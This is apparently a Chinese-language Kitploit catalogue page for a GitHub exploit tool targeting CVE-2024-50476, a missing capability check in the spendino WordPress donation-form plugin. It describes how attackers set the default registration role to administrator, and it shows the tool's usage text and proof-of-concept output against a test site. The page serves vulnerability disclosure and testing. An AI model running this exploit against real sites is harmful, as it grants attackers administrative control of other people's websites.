Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-50476 — GRÜN spendino Spendenformular <= 1.0.1 - 未认证的任意选项更新 | Kitploit
工具/GitHubGitHub/randomrobbiebf/cve-2024-50476
权限提升漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubrandomrobbiebf/cve-2024-50476

CVE-2024-50476

GRÜN spendino Spendenformular <= 1.0.1 - 未认证的任意选项更新

查看仓库
11年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-50476

GRÜN spendino Spendenformular <= 1.0.1 - 未授权的任意选项更新

描述:

GRÜN spendino Spendenformular – Mehr Spenden! Weniger Arbeit! WordPress插件在所有版本直到并包括1.0.1中,由于缺少权限检查,存在未授权修改数据的漏洞,可导致权限提升。这使得未经验证的攻击者能够更新WordPress站点上的任意选项。攻击者可利用此漏洞将默认注册角色更新为管理员,并启用用户注册,从而获得对易受攻击站点的管理员访问权限。

root@kitploit:~
Published: 2024-10-25 00:00:00
CVE: CVE-2024-50476
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 9.8
Slugs: spendino

如何使用

root@kitploit:~
$ python3 CVE-2024-50476.py -h
usage: CVE-2024-50476.py [-h] -u URL [-f FIX]

CVE-2024-50476 | GRÜN spendino Spendenformular <= 1.0.1 - Unauthenticated Arbitrary Options Update The GRÜN spendino Spendenformular – Mehr Spenden! Weniger Arbeit! plugin for WordPress is vulnerable to unauthorized modification of data that
can lead to privilege escalation due to a missing capability check in all versions up to, and including, 1.0.1. This makes it possible for unauthenticated attackers to update arbitrary options on the WordPress site. This can be leveraged to
update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.

options:
  -h, --help         show this help message and exit
  -u URL, --url URL  Website URL
  -f FIX, --fix FIX  Reset after Exploit

PoC

root@kitploit:~
$ python3 CVE-2024-50476.py -u https://wpscan-vulnerability-test-bench.ddev.site
Vulnerability check: https://wpscan-vulnerability-test-bench.ddev.site
Option set successfully: https://wpscan-vulnerability-test-bench.ddev.site/wp-admin/admin-ajax.php
You can now register a user as an admin user. Remember to run --fix yes after you have registered to prevent others exploiting the site.
Option set successfully: https://wpscan-vulnerability-test-bench.ddev.site/wp-admin/admin-ajax.php
You can now register a user as an admin user. Remember to run --fix yes after you have registered to prevent others exploiting the site.
下载工具